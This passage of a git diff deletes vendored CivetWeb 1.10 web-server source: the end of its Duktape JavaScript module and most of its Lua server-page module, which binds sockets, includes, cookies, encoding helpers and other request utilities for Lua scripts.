-	duk_put_prop_string(duk_ctx, -2, "uri");
-
-	duk_push_string(duk_ctx, conn->request_info.http_version);
-	duk_put_prop_string(duk_ctx, -2, "http_version");
-
-	duk_push_string(duk_ctx, conn->request_info.query_string);
-	duk_put_prop_string(duk_ctx, -2, "query_string");
-
-	duk_push_string(duk_ctx, conn->request_info.remote_addr);
-	duk_put_prop_string(duk_ctx, -2, "remote_addr");
-
-	duk_push_int(duk_ctx, conn->request_info.remote_port);
-	duk_put_prop_string(duk_ctx, -2, "remote_port");
-
-	duk_push_int(duk_ctx, ntohs(conn->client.lsa.sin.sin_port));
-	duk_put_prop_string(duk_ctx, -2, "server_port");
-
-	duk_push_object(duk_ctx); /* subfolder "conn.http_headers" */
-	for (i = 0; i < conn->request_info.num_headers; i++) {
-		duk_push_string(duk_ctx, conn->request_info.http_headers[i].value);
-		duk_put_prop_string(duk_ctx,
-		                    -2,
-		                    conn->request_info.http_headers[i].name);
-	}
-	duk_put_prop_string(duk_ctx, -2, "http_headers");
-
-	duk_put_prop_string(duk_ctx, -2, "conn"); /* call the table "conn" */
-
-	/* Add "civetweb" object */
-	duk_push_global_object(duk_ctx);
-	duk_push_object(duk_ctx); /* create a new table/object ("conn") */
-
-	duk_push_string(duk_ctx, CIVETWEB_VERSION);
-	duk_put_prop_string(duk_ctx, -2, "version");
-
-	duk_push_string(duk_ctx, script_name);
-	duk_put_prop_string(duk_ctx, -2, "script_name");
-
-	if (conn->ctx != NULL) {
-		duk_push_c_function(duk_ctx, duk_itf_getoption, 1 /* 1 = nargs */);
-		duk_push_pointer(duk_ctx, (void *)(conn->ctx));
-		duk_put_prop_string(duk_ctx, -2, civetweb_ctx_id);
-		duk_put_prop_string(duk_ctx,
-		                    -2,
-		                    "getoption"); /* add function conn.write */
-
-		if (conn->ctx->systemName != NULL) {
-			duk_push_string(duk_ctx, conn->ctx->systemName);
-			duk_put_prop_string(duk_ctx, -2, "system");
-		}
-	}
-
-	duk_put_prop_string(duk_ctx,
-	                    -2,
-	                    "civetweb"); /* call the table "civetweb" */
-
-	duk_push_global_stash(duk_ctx);
-	duk_push_pointer(duk_ctx, (void *)conn);
-	duk_put_prop_string(duk_ctx, -2, civetweb_conn_id);
-
-	if (duk_peval_file(duk_ctx, script_name) != 0) {
-		mg_cry(conn, "%s", duk_safe_to_string(duk_ctx, -1));
-		goto exec_duktape_finished;
-	}
-	duk_pop(duk_ctx); /* ignore result */
-
-exec_duktape_finished:
-	duk_destroy_heap(duk_ctx);
-}
-
-
-/* End of mod_duktape.inl */
diff --git a/thirdparty/civetweb-1.10/src/mod_lua.inl b/thirdparty/civetweb-1.10/src/mod_lua.inl
deleted file mode 100644
index fece6e8..0000000
--- a/thirdparty/civetweb-1.10/src/mod_lua.inl
+++ /dev/null
@@ -1,2371 +0,0 @@
-/* This file is part of the CivetWeb web server.
- * See https://github.com/civetweb/civetweb/
- */
-
-#include "civetweb_lua.h"
-#include "civetweb_private_lua.h"
-
-#ifdef _WIN32
-static void *
-mmap(void *addr, int64_t len, int prot, int flags, int fd, int offset)
-{
-	/* TODO (low): This is an incomplete implementation of mmap for windows.
-	 * Currently it is sufficient, but there are a lot of unused parameters.
-	 * Better use a function "mg_map" which only has the required parameters,
-	 * and implement it using mmap in Linux and CreateFileMapping in Windows.
-	 * Noone should expect a full mmap for Windows here.
-	 */
-	HANDLE fh = (HANDLE)_get_osfhandle(fd);
-	HANDLE mh = CreateFileMapping(fh, 0, PAGE_READONLY, 0, 0, 0);
-	void *p = MapViewOfFile(mh, FILE_MAP_READ, 0, 0, (size_t)len);
-	CloseHandle(mh);
-
-	/* unused parameters */
-	(void)addr;
-	(void)prot;
-	(void)flags;
-	(void)offset;
-
-	return p;
-}
-
-static void
-munmap(void *addr, int64_t length)
-{
-	/* unused parameters */
-	(void)length;
-
-	UnmapViewOfFile(addr);
-}
-
-#define MAP_FAILED (NULL)
-#define MAP_PRIVATE (0)
-#define PROT_READ (0)
-#else
-#include <sys/mman.h>
-#endif
-
-static const char *LUASOCKET = "luasocket";
-static const char lua_regkey_ctx = 1;
-static const char lua_regkey_connlist = 2;
-static const char lua_regkey_lsp_include_history = 3;
-static const char *LUABACKGROUNDPARAMS = "mg";
-
-#ifndef LSP_INCLUDE_MAX_DEPTH
-#define LSP_INCLUDE_MAX_DEPTH (32)
-#endif
-
-
-/* Forward declarations */
-static void handle_request(struct mg_connection *);
-static int handle_lsp_request(struct mg_connection *,
-                              const char *,
-                              struct mg_file *,
-                              struct lua_State *);
-
-static void
-reg_lstring(struct lua_State *L,
-            const char *name,
-            const void *buffer,
-            size_t buflen)
-{
-	if (name != NULL && buffer != NULL) {
-		lua_pushstring(L, name);
-		lua_pushlstring(L, (const char *)buffer, buflen);
-		lua_rawset(L, -3);
-	}
-}
-
-static void
-reg_llstring(struct lua_State *L,
-             const void *buffer1,
-             size_t buflen1,
-             const void *buffer2,
-             size_t buflen2)
-{
-	if (buffer1 != NULL && buffer2 != NULL) {
-		lua_pushlstring(L, (const char *)buffer1, buflen1);
-		lua_pushlstring(L, (const char *)buffer2, buflen2);
-		lua_rawset(L, -3);
-	}
-}
-
-#define reg_string(L, name, val)                                               \
-	reg_lstring(L, name, val, val ? strlen(val) : 0)
-
-static void
-reg_int(struct lua_State *L, const char *name, int val)
-{
-	if (name != NULL) {
-		lua_pushstring(L, name);
-		lua_pushinteger(L, val);
-		lua_rawset(L, -3);
-	}
-}
-
-static void
-reg_boolean(struct lua_State *L, const char *name, int val)
-{
-	if (name != NULL) {
-		lua_pushstring(L, name);
-		lua_pushboolean(L, val != 0);
-		lua_rawset(L, -3);
-	}
-}
-
-static void
-reg_conn_function(struct lua_State *L,
-                  const char *name,
-                  lua_CFunction func,
-                  struct mg_connection *conn)
-{
-	if (name != NULL && func != NULL && conn != NULL) {
-		lua_pushstring(L, name);
-		lua_pushlightuserdata(L, conn);
-		lua_pushcclosure(L, func, 1);
-		lua_rawset(L, -3);
-	}
-}
-
-static void
-reg_function(struct lua_State *L, const char *name, lua_CFunction func)
-{
-	if (name != NULL && func != NULL) {
-		lua_pushstring(L, name);
-		lua_pushcclosure(L, func, 0);
-		lua_rawset(L, -3);
-	}
-}
-
-static void
-lua_cry(struct mg_connection *conn,
-        int err,
-        lua_State *L,
-        const char *lua_title,
-        const char *lua_operation)
-{
-	switch (err) {
-	case LUA_OK:
-	case LUA_YIELD:
-		break;
-	case LUA_ERRRUN:
-		mg_cry(conn,
-		       "%s: %s failed: runtime error: %s",
-		       lua_title,
-		       lua_operation,
-		       lua_tostring(L, -1));
-		break;
-	case LUA_ERRSYNTAX:
-		mg_cry(conn,
-		       "%s: %s failed: syntax error: %s",
-		       lua_title,
-		       lua_operation,
-		       lua_tostring(L, -1));
-		break;
-	case LUA_ERRMEM:
-		mg_cry(conn, "%s: %s failed: out of memory", lua_title, lua_operation);
-		break;
-	case LUA_ERRGCMM:
-		mg_cry(conn,
-		       "%s: %s failed: error during garbage collection",
-		       lua_title,
-		       lua_operation);
-		break;
-	case LUA_ERRERR:
-		mg_cry(conn,
-		       "%s: %s failed: error in error handling: %s",
-		       lua_title,
-		       lua_operation,
-		       lua_tostring(L, -1));
-		break;
-	default:
-		mg_cry(conn, "%s: %s failed: error %i", lua_title, lua_operation, err);
-		break;
-	}
-}
-
-static int
-lsp_sock_close(lua_State *L)
-{
-	int num_args = lua_gettop(L);
-	size_t s;
-	SOCKET *psock;
-
-	if ((num_args == 1) && lua_istable(L, -1)) {
-		lua_getfield(L, -1, "sock");
-		psock = (SOCKET *)lua_tolstring(L, -1, &s);
-		if (s != sizeof(SOCKET)) {
-			return luaL_error(L, "invalid internal state in :close() call");
-		}
-		/* Do not closesocket(*psock); here, close it in __gc */
-		(void)psock;
-	} else {
-		return luaL_error(L, "invalid :close() call");
-	}
-	return 0;
-}
-
-static int
-lsp_sock_recv(lua_State *L)
-{
-	int num_args = lua_gettop(L);
-	char buf[2000];
-	int n;
-	size_t s;
-	SOCKET *psock;
-
-	if ((num_args == 1) && lua_istable(L, -1)) {
-		lua_getfield(L, -1, "sock");
-		psock = (SOCKET *)lua_tolstring(L, -1, &s);
-		if (s != sizeof(SOCKET)) {
-			return luaL_error(L, "invalid internal state in :recv() call");
-		}
-		n = recv(*psock, buf, sizeof(buf), 0);
-		if (n <= 0) {
-			lua_pushnil(L);
-		} else {
-			lua_pushlstring(L, buf, n);
-		}
-	} else {
-		return luaL_error(L, "invalid :recv() call");
-	}
-	return 1;
-}
-
-static int
-lsp_sock_send(lua_State *L)
-{
-	int num_args = lua_gettop(L);
-	const char *buf;
-	size_t len, sent = 0;
-	int n = 0;
-	size_t s;
-	SOCKET *psock;
-
-	if ((num_args == 2) && lua_istable(L, -2) && lua_isstring(L, -1)) {
-		buf = lua_tolstring(L, -1, &len);
-		lua_getfield(L, -2, "sock");
-		psock = (SOCKET *)lua_tolstring(L, -1, &s);
-		if (s != sizeof(SOCKET)) {
-			return luaL_error(L, "invalid internal state in :close() call");
-		}
-
-		while (sent < len) {
-			if ((n = send(*psock, buf + sent, (int)(len - sent), 0)) <= 0) {
-				break;
-			}
-			sent += n;
-		}
-		lua_pushnumber(L, n);
-	} else {
-		return luaL_error(L, "invalid :close() call");
-	}
-	return 1;
-}
-
-static int
-lsp_sock_gc(lua_State *L)
-{
-	int num_args = lua_gettop(L);
-	size_t s;
-	SOCKET *psock;
-
-	if ((num_args == 1) && lua_istable(L, -1)) {
-		lua_getfield(L, -1, "sock");
-		psock = (SOCKET *)lua_tolstring(L, -1, &s);
-		if (s != sizeof(SOCKET)) {
-			return luaL_error(
-			    L,
-			    "invalid internal state in __gc for object created by connect");
-		}
-		closesocket(*psock);
-	} else {
-		return luaL_error(L, "__gc for object created by connect failed");
-	}
-	return 0;
-}
-
-/* Methods and meta-methods supported by the object returned by connect.
- * For meta-methods, see http://lua-users.org/wiki/MetatableEvents */
-static const struct luaL_Reg luasocket_methods[] = {{"close", lsp_sock_close},
-                                                    {"send", lsp_sock_send},
-                                                    {"recv", lsp_sock_recv},
-                                                    {"__gc", lsp_sock_gc},
-                                                    {NULL, NULL}};
-
-static int
-lsp_connect(lua_State *L)
-{
-	int num_args = lua_gettop(L);
-	char ebuf[100];
-	SOCKET sock;
-	union usa sa;
-	int ok;
-
-	if ((num_args == 3) && lua_isstring(L, -3) && lua_isnumber(L, -2)
-	    && lua_isnumber(L, -1)) {
-		ok = connect_socket(NULL,
-		                    lua_tostring(L, -3),
-		                    (int)lua_tonumber(L, -2),
-		                    (int)lua_tonumber(L, -1),
-		                    ebuf,
-		                    sizeof(ebuf),
-		                    &sock,
-		                    &sa);
-		if (!ok) {
-			return luaL_error(L, ebuf);
-		} else {
-			lua_newtable(L);
-			reg_lstring(L, "sock", (const char *)&sock, sizeof(SOCKET));
-			reg_string(L, "host", lua_tostring(L, -4));
-			luaL_getmetatable(L, LUASOCKET);
-			lua_setmetatable(L, -2);
-		}
-	} else {
-		return luaL_error(
-		    L, "connect(host,port,is_ssl): invalid parameter given.");
-	}
-	return 1;
-}
-
-static int
-lsp_error(lua_State *L)
-{
-	lua_getglobal(L, "mg");
-	lua_getfield(L, -1, "onerror");
-	lua_pushvalue(L, -3);
-	lua_pcall(L, 1, 0, 0);
-	return 0;
-}
-
-/* Silently stop processing chunks. */
-static void
-lsp_abort(lua_State *L)
-{
-	int top = lua_gettop(L);
-	lua_getglobal(L, "mg");
-	lua_pushnil(L);
-	lua_setfield(L, -2, "onerror");
-	lua_settop(L, top);
-	lua_pushstring(L, "aborting");
-	lua_error(L);
-}
-
-struct lsp_var_reader_data {
-	const char *begin;
-	unsigned len;
-	unsigned state;
-};
-
-
-static const char *
-lsp_var_reader(lua_State *L, void *ud, size_t *sz)
-{
-	struct lsp_var_reader_data *reader = (struct lsp_var_reader_data *)ud;
-	const char *ret;
-	(void)(L); /* unused */
-
-	switch (reader->state) {
-	case 0:
-		ret = "mg.write(";
-		*sz = strlen(ret);
-		break;
-	case 1:
-		ret = reader->begin;
-		*sz = reader->len;
-		break;
-	case 2:
-		ret = ")";
-		*sz = strlen(ret);
-		break;
-	default:
-		ret = 0;
-		*sz = 0;
-	}
-
-	reader->state++;
-	return ret;
-}
-
-
-static int
-run_lsp(struct mg_connection *conn,
-        const char *path,
-        const char *p,
-        int64_t len,
-        lua_State *L)
-{
-	int i, j, pos = 0, lines = 1, lualines = 0, is_var, lua_ok;
-	char chunkname[MG_BUF_LEN];
-	struct lsp_var_reader_data data;
-
-	for (i = 0; i < len; i++) {
-		if (p[i] == '\n')
-			lines++;
-		if (((i + 1) < len) && (p[i] == '<') && (p[i + 1] == '?')) {
-
-			/* <?= ?> means a variable is enclosed and its value should be
-			 * printed */
-			is_var = (((i + 2) < len) && (p[i + 2] == '='));
-
-			if (is_var)
-				j = i + 2;
-			else
-				j = i + 1;
-
-			while (j < len) {
-				if (p[j] == '\n')
-					lualines++;
-				if (((j + 1) < len) && (p[j] == '?') && (p[j + 1] == '>')) {
-					mg_write(conn, p + pos, i - pos);
-
-					mg_snprintf(conn,
-					            NULL, /* name only used for debugging */
-					            chunkname,
-					            sizeof(chunkname),
-					            "@%s+%i",
-					            path,
-					            lines);
-					lua_pushlightuserdata(L, conn);
-					lua_pushcclosure(L, lsp_error, 1);
-
-					if (is_var) {
-						data.begin = p + (i + 3);
-						data.len = j - (i + 3);
-						data.state = 0;
-						lua_ok = mg_lua_load(
-						    L, lsp_var_reader, &data, chunkname, NULL);
-					} else {
-						lua_ok = luaL_loadbuffer(L,
-						                         p + (i + 2),
-						                         j - (i + 2),
-						                         chunkname);
-					}
-
-					if (lua_ok) {
-						/* Syntax error or OOM. Error message is pushed on
-						 * stack. */
-						lua_pcall(L, 1, 0, 0);
-					} else {
-						/* Success loading chunk. Call it. */
-						lua_pcall(L, 0, 0, 1);
-					}
-
-					pos = j + 2;
-					i = pos - 1;
-					break;
-				}
-				j++;
-			}
-
-			if (lualines > 0) {
-				lines += lualines;
-				lualines = 0;
-			}
-		}
-	}
-
-	if (i > pos) {
-		mg_write(conn, p + pos, i - pos);
-	}
-
-	return 0;
-}
-
-
-/* mg.write: Send data to the client */
-static int
-lsp_write(lua_State *L)
-{
-	struct mg_connection *conn =
-	    (struct mg_connection *)lua_touserdata(L, lua_upvalueindex(1));
-	int num_args = lua_gettop(L);
-	const char *str;
-	size_t size;
-	int i;
-	int rv = 1;
-
-	for (i = 1; i <= num_args; i++) {
-		if (lua_isstring(L, i)) {
-			str = lua_tolstring(L, i, &size);
-			if (mg_write(conn, str, size) != (int)size) {
-				rv = 0;
-			}
-		}
-	}
-	lua_pushboolean(L, rv);
-
-	return 1;
-}
-
-
-/* mg.read: Read data from the client (e.g., from a POST request) */
-static int
-lsp_read(lua_State *L)
-{
-	struct mg_connection *conn =
-	    (struct mg_connection *)lua_touserdata(L, lua_upvalueindex(1));
-	char buf[1024];
-	int len = mg_read(conn, buf, sizeof(buf));
-
-	if (len <= 0)
-		return 0;
-	lua_pushlstring(L, buf, len);
-
-	return 1;
-}
-
-
-/* mg.keep_alive: Allow Lua pages to use the http keep-alive mechanism */
-static int
-lsp_keep_alive(lua_State *L)
-{
-	struct mg_connection *conn =
-	    (struct mg_connection *)lua_touserdata(L, lua_upvalueindex(1));
-	int num_args = lua_gettop(L);
-
-	/* This function may be called with one parameter (boolean) to set the
-	keep_alive state.
-	Or without a parameter to just query the current keep_alive state. */
-	if ((num_args == 1) && lua_isboolean(L, 1)) {
-		conn->must_close = !lua_toboolean(L, 1);
-	} else if (num_args != 0) {
-		/* Syntax error */
-		return luaL_error(L, "invalid keep_alive() call");
-	}
-
-	/* Return the current "keep_alive" state. This may be false, even it
-	 * keep_alive(true) has been called. */
-	lua_pushboolean(L, should_keep_alive(conn));
-	return 1;
-}
-
-
-/* Stack of includes */
-struct lsp_include_history {
-	int depth;
-	const char *script[LSP_INCLUDE_MAX_DEPTH + 1];
-};
-
-
-/* mg.include: Include another .lp file */
-static int
-lsp_include(lua_State *L)
-{
-	struct mg_connection *conn =
-	    (struct mg_connection *)lua_touserdata(L, lua_upvalueindex(1));
-	int num_args = lua_gettop(L);
-	struct mg_file file = STRUCT_FILE_INITIALIZER;
-	const char *file_name = (num_args >= 1) ? lua_tostring(L, 1) : NULL;
-	const char *path_type = (num_args >= 2) ? lua_tostring(L, 2) : NULL;
-	struct lsp_include_history *include_history;
-
-	if ((file_name) && (num_args <= 2)) {
-
-		lua_pushlightuserdata(L, (void *)&lua_regkey_lsp_include_history);
-		lua_gettable(L, LUA_REGISTRYINDEX);
-		include_history = (struct lsp_include_history *)lua_touserdata(L, -1);
-
-		if (include_history->depth >= ((int)(LSP_INCLUDE_MAX_DEPTH))) {
-			mg_cry(conn,
-			       "lsp max include depth of %i reached while including %s",
-			       (int)(LSP_INCLUDE_MAX_DEPTH),
-			       file_name);
-		} else {
-			char file_name_path[512];
-			char *p;
-			size_t len;
-			int truncated = 0;
-
-			file_name_path[511] = 0;
-
-			if (path_type && (*path_type == 'v')) {
-				/* "virtual" = relative to document root. */
-				(void)mg_snprintf(conn,
-				                  &truncated,
-				                  file_name_path,
-				                  sizeof(file_name_path),
-				                  "%s/%s",
-				                  conn->ctx->config[DOCUMENT_ROOT],
-				                  file_name);
-
-			} else if ((path_type && (*path_type == 'a'))
-			           || (path_type == NULL)) {
-				/* "absolute" = file name is relative to the
-				 * webserver working directory
-				 * or it is absolute system path. */
-				/* path_type==NULL is the legacy use case with 1 argument */
-				(void)mg_snprintf(conn,
-				                  &truncated,
-				                  file_name_path,
-				                  sizeof(file_name_path),
-				                  "%s",
-				                  file_name);
-
-			} else if (path_type && (*path_type == 'r' || *path_type == 'f')) {
-				/* "relative" = file name is relative to the
-				 * currect document */
-				(void)mg_snprintf(
-				    conn,
-				    &truncated,
-				    file_name_path,
-				    sizeof(file_name_path),
-				    "%s",
-				    include_history->script[include_history->depth]);
-
-				if (!truncated) {
-					if ((p = strrchr(file_name_path, '/')) != NULL) {
-						p[1] = '\0';
-					}
-					len = strlen(file_name_path);
-					(void)mg_snprintf(conn,
-					                  &truncated,
-					                  file_name_path + len,
-					                  sizeof(file_name_path) - len,
-					                  "%s",
-					                  file_name);
-				}
-
-			} else {
-				return luaL_error(
-				    L,
-				    "invalid path_type in include(file_name, path_type) call");
-			}
-
-			if (handle_lsp_request(conn, file_name_path, &file, L)) {
-				/* handle_lsp_request returned an error code, meaning an error
-				* occured in the included page and mg.onerror returned non-zero.
-				* Stop processing.
-				*/
-
-				lsp_abort(L);
-			}
-		}
-
-	} else {
-		/* Syntax error */
-		return luaL_error(L, "invalid include() call");
-	}
-	return 0;
-}
-
-
-/* mg.cry: Log an error. Default value for mg.onerror. */
-static int
-lsp_cry(lua_State *L)
-{
-	struct mg_connection *conn =
-	    (struct mg_connection *)lua_touserdata(L, lua_upvalueindex(1));
-	int num_args = lua_gettop(L);
-	const char *text = (num_args == 1) ? lua_tostring(L, 1) : NULL;
-
-	if (text) {
-		mg_cry(conn, "%s", lua_tostring(L, -1));
-	} else {
-		/* Syntax error */
-		return luaL_error(L, "invalid cry() call");
-	}
-	return 0;
-}
-
-
-/* mg.redirect: Redirect the request (internally). */
-static int
-lsp_redirect(lua_State *L)
-{
-	struct mg_connection *conn =
-	    (struct mg_connection *)lua_touserdata(L, lua_upvalueindex(1));
-	int num_args = lua_gettop(L);
-	const char *target = (num_args == 1) ? lua_tostring(L, 1) : NULL;
-
-	if (target) {
-		conn->request_info.local_uri = target;
-		handle_request(conn);
-		lsp_abort(L);
-	} else {
-		/* Syntax error */
-		return luaL_error(L, "invalid redirect() call");
-	}
-	return 0;
-}
-
-
-/* mg.send_file */
-static int
-lsp_send_file(lua_State *L)
-{
-	struct mg_connection *conn =
-	    (struct mg_connection *)lua_touserdata(L, lua_upvalueindex(1));
-	int num_args = lua_gettop(L);
-	const char *filename = (num_args == 1) ? lua_tostring(L, 1) : NULL;
-
-	if (filename) {
-		mg_send_file(conn, filename);
-	} else {
-		/* Syntax error */
-		return luaL_error(L, "invalid send_file() call");
-	}
-	return 0;
-}
-
-
-/* mg.get_time */
-static int
-lsp_get_time(lua_State *L)
-{
-	int num_args = lua_gettop(L);
-	int monotonic = (num_args > 0) ? lua_toboolean(L, 1) : 0;
-	struct timespec ts;
-	double d;
-
-	clock_gettime(monotonic ? CLOCK_MONOTONIC : CLOCK_REALTIME, &ts);
-	d = (double)ts.tv_sec + ((double)ts.tv_nsec * 1.0E-9);
-	lua_pushnumber(L, d);
-	return 1;
-}
-
-
-/* mg.get_var */
-static int
-lsp_get_var(lua_State *L)
-{
-	int num_args = lua_gettop(L);
-	const char *data, *var_name;
-	size_t data_len, occurrence;
-	int ret;
-	struct mg_context *ctx;
-
-	lua_pushlightuserdata(L, (void *)&lua_regkey_ctx);
-	lua_gettable(L, LUA_REGISTRYINDEX);
-	ctx = (struct mg_context *)lua_touserdata(L, -1);
-
-	if (num_args >= 2 && num_args <= 3) {
-		char *dst;
-		data = lua_tolstring(L, 1, &data_len);
-		var_name = lua_tostring(L, 2);
-		occurrence = (num_args > 2) ? (long)lua_tonumber(L, 3) : 0;
-
-		/* Allocate dynamically, so there is no internal limit for get_var */
-		dst = (char *)mg_malloc_ctx(data_len + 1, ctx);
-		if (!dst) {
-			return luaL_error(L, "out of memory in get_var() call");
-		}
-
-		ret = mg_get_var2(data, data_len, var_name, dst, data_len, occurrence);
-		if (ret >= 0) {
-			/* Variable found: return value to Lua */
-			lua_pushstring(L, dst);
-		} else {
-			/* Variable not found (TODO (mid): may be string too long) */
-			lua_pushnil(L);
-		}
-		mg_free(dst);
-	} else {
-		/* Syntax error */
-		return luaL_error(L, "invalid get_var() call");
-	}
-	return 1;
-}
-
-
-/* mg.get_mime_type */
-static int
-lsp_get_mime_type(lua_State *L)
-{
-	int num_args = lua_gettop(L);
-	struct vec mime_type = {0, 0};
-	struct mg_context *ctx;
-	const char *text;
-
-	lua_pushlightuserdata(L, (void *)&lua_regkey_ctx);
-	lua_gettable(L, LUA_REGISTRYINDEX);
-	ctx = (struct mg_context *)lua_touserdata(L, -1);
-
-	if (num_args == 1) {
-		text = lua_tostring(L, 1);
-		if (text) {
-			if (ctx) {
-				get_mime_type(ctx, text, &mime_type);
-				lua_pushlstring(L, mime_type.ptr, mime_type.len);
-			} else {
-				text = mg_get_builtin_mime_type(text);
-				lua_pushstring(L, text);
-			}
-		} else {
-			/* Syntax error */
-			return luaL_error(L, "invalid argument for get_mime_type() call");
-		}
-	} else {
-		/* Syntax error */
-		return luaL_error(L, "invalid get_mime_type() call");
-	}
-	return 1;
-}
-
-
-/* mg.get_cookie */
-static int
-lsp_get_cookie(lua_State *L)
-{
-	int num_args = lua_gettop(L);
-	const char *cookie;
-	const char *var_name;
-	int ret;
-	struct mg_context *ctx;
-
-	lua_pushlightuserdata(L, (void *)&lua_regkey_ctx);
-	lua_gettable(L, LUA_REGISTRYINDEX);
-	ctx = (struct mg_context *)lua_touserdata(L, -1);
-
-	if (num_args == 2) {
-		/* Correct number of arguments */
-		size_t data_len;
-		char *dst;
-
-		cookie = lua_tolstring(L, 1, &data_len);
-		var_name = lua_tostring(L, 2);
-
-		if (cookie == NULL || var_name == NULL) {
-			/* Syntax error */
-			return luaL_error(L, "invalid get_cookie() call");
-		}
-
-		dst = (char *)mg_malloc_ctx(data_len + 1, ctx);
-		if (!dst) {
-			return luaL_error(L, "out of memory in get_cookie() call");
-		}
-
-		ret = mg_get_cookie(cookie, var_name, dst, data_len);
-
-		if (ret >= 0) {
-			lua_pushlstring(L, dst, ret);
-		} else {
-			lua_pushnil(L);
-		}
-		mg_free(dst);
-
-	} else {
-		/* Syntax error */
-		return luaL_error(L, "invalid get_cookie() call");
-	}
-	return 1;
-}
-
-
-/* mg.md5 */
-static int
-lsp_md5(lua_State *L)
-{
-	int num_args = lua_gettop(L);
-	const char *text;
-	md5_byte_t hash[16];
-	md5_state_t ctx;
-	size_t text_len;
-	char buf[40];
-
-	if (num_args == 1) {
-		text = lua_tolstring(L, 1, &text_len);
-		if (text) {
-			md5_init(&ctx);
-			md5_append(&ctx, (const md5_byte_t *)text, text_len);
-			md5_finish(&ctx, hash);
-			bin2str(buf, hash, sizeof(hash));
-			lua_pushstring(L, buf);
-		} else {
-			lua_pushnil(L);
-		}
-	} else {
-		/* Syntax error */
-		return luaL_error(L, "invalid md5() call");
-	}
-	return 1;
-}
-
-
-/* mg.url_encode */
-static int
-lsp_url_encode(lua_State *L)
-{
-	int num_args = lua_gettop(L);
-	const char *text;
-	size_t text_len;
-	char *dst;
-	int dst_len;
-	struct mg_context *ctx;
-
-	lua_pushlightuserdata(L, (void *)&lua_regkey_ctx);
-	lua_gettable(L, LUA_REGISTRYINDEX);
-	ctx = (struct mg_context *)lua_touserdata(L, -1);
-
-	if (num_args == 1) {
-		text = lua_tolstring(L, 1, &text_len);
-		if (text) {
-			dst_len = 3 * (int)text_len + 1;
-			dst = ((text_len < 0x2AAAAAAA) ? (char *)mg_malloc_ctx(dst_len, ctx)
-			                               : (char *)NULL);
-			if (dst) {
-				mg_url_encode(text, dst, dst_len);
-				lua_pushstring(L, dst);
-				mg_free(dst);
-			} else {
-				return luaL_error(L, "out of memory in url_decode() call");
-			}
-		} else {
-			lua_pushnil(L);
-		}
-	} else {
-		/* Syntax error */
-		return luaL_error(L, "invalid url_encode() call");
-	}
-	return 1;
-}
-
-
-/* mg.url_decode */
-static int
-lsp_url_decode(lua_State *L)
-{
-	int num_args = lua_gettop(L);
-	const char *text;
-	size_t text_len;
-	int is_form;
-	char *dst;
-	int dst_len;
-	struct mg_context *ctx;
-
-	lua_pushlightuserdata(L, (void *)&lua_regkey_ctx);
-	lua_gettable(L, LUA_REGISTRYINDEX);
-	ctx = (struct mg_context *)lua_touserdata(L, -1);
-
-	if (num_args == 1 || (num_args == 2 && lua_isboolean(L, 2))) {
-		text = lua_tolstring(L, 1, &text_len);
-		is_form = (num_args == 2) ? lua_isboolean(L, 2) : 0;
-		if (text) {
-			dst_len = (int)text_len + 1;
-			dst = ((text_len < 0x7FFFFFFF) ? (char *)mg_malloc_ctx(dst_len, ctx)
-			                               : (char *)NULL);
-			if (dst) {
-				mg_url_decode(text, (int)text_len, dst, dst_len, is_form);
-				lua_pushstring(L, dst);
-				mg_free(dst);
-			} else {
-				return luaL_error(L, "out of memory in url_decode() call");
-			}
-		} else {
-			lua_pushnil(L);
-		}
-	} else {
-		/* Syntax error */
-		return luaL_error(L, "invalid url_decode() call");
-	}
-	return 1;
-}
-
-
-/* mg.base64_encode */
-static int
-lsp_base64_encode(lua_State *L)
-{
-	int num_args = lua_gettop(L);
-	const char *text;
-	size_t text_len;
-	char *dst;
-	struct mg_context *ctx;
-
-	lua_pushlightuserdata(L, (void *)&lua_regkey_ctx);
-	lua_gettable(L, LUA_REGISTRYINDEX);
-	ctx = (struct mg_context *)lua_touserdata(L, -1);
-
-	if (num_args == 1) {
-		text = lua_tolstring(L, 1, &text_len);
-		if (text) {
-			dst = (char *)mg_malloc_ctx(text_len * 8 / 6 + 4, ctx);
-			if (dst) {
-				base64_encode((const unsigned char *)text, (int)text_len, dst);
-				lua_pushstring(L, dst);
-				mg_free(dst);
-			} else {
-				return luaL_error(L, "out of memory in base64_encode() call");
-			}
-		} else {
-			lua_pushnil(L);
-		}
-	} else {
-		/* Syntax error */
-		return luaL_error(L, "invalid base64_encode() call");
-	}
-	return 1;
-}
-
-
-/* mg.base64_encode */
-static int
-lsp_base64_decode(lua_State *L)
-{
-	int num_args = lua_gettop(L);
-	const char *text;
-	size_t text_len, dst_len;
-	int ret;
-	char *dst;
-	struct mg_context *ctx;
-
-	lua_pushlightuserdata(L, (void *)&lua_regkey_ctx);
-	lua_gettable(L, LUA_REGISTRYINDEX);
-	ctx = (struct mg_context *)lua_touserdata(L, -1);
-
-	if (num_args == 1) {
-		text = lua_tolstring(L, 1, &text_len);
-		if (text) {
-			dst = (char *)mg_malloc_ctx(text_len, ctx);
-			if (dst) {
-				ret = base64_decode((const unsigned char *)text,
-				                    (int)text_len,
-				                    dst,
-				                    &dst_len);
-				if (ret != -1) {
-					mg_free(dst);
-					return luaL_error(
-					    L, "illegal character in lsp_base64_decode() call");
-				} else {
-					lua_pushlstring(L, dst, dst_len);
-					mg_free(dst);
-				}
-			} else {
-				return luaL_error(L,
-				                  "out of memory in lsp_base64_decode() call");
-			}
-		} else {
-			lua_pushnil(L);
-		}
-	} else {
-		/* Syntax error */
-		return luaL_error(L, "invalid lsp_base64_decode() call");
-	}
-	return 1;
-}
-
-
-/* mg.get_response_code_text */
-static int
-lsp_get_response_code_text(lua_State *L)
-{
-	int num_args = lua_gettop(L);
-	int type1;
-	double code;
-	const char *text;
-
-	if (num_args == 1) {
-		type1 = lua_type(L, 1);
-		if (type1 == LUA_TNUMBER) {
-			/* If the first argument is a number,
-			   convert it to the corresponding text. */
-			code = lua_tonumber(L, 1);
-			text = mg_get_response_code_text(NULL, (int)code);
-			if (text)
-				lua_pushstring(L, text);
-			return text ? 1 : 0;
-		}
-	}
-
-	/* Syntax error */
-	return luaL_error(L, "invalid get_response_code_text() call");
-}
-
-
-/* mg.random - might be better than math.random on some systems */
-static int
-lsp_random(lua_State *L)
-{
-	int num_args = lua_gettop(L);
-	if (num_args == 0) {
-		/* The civetweb internal random number generator will generate
-		         * a 64 bit random number. */
-		uint64_t r = get_random();
-		/* Lua "number" is a IEEE 754 double precission float:
- * https://en.wikipedia.org/wiki/Double-precision_floating-point_format
-		 * Thus, mask with 2^53-1 to get an integer with the maximum
- * precission available. */
-		r &= ((((uint64_t)1) << 53) - 1);
-		lua_pushnumber(L, (double)r);
-		return 1;
-	}
-
-	/* Syntax error */
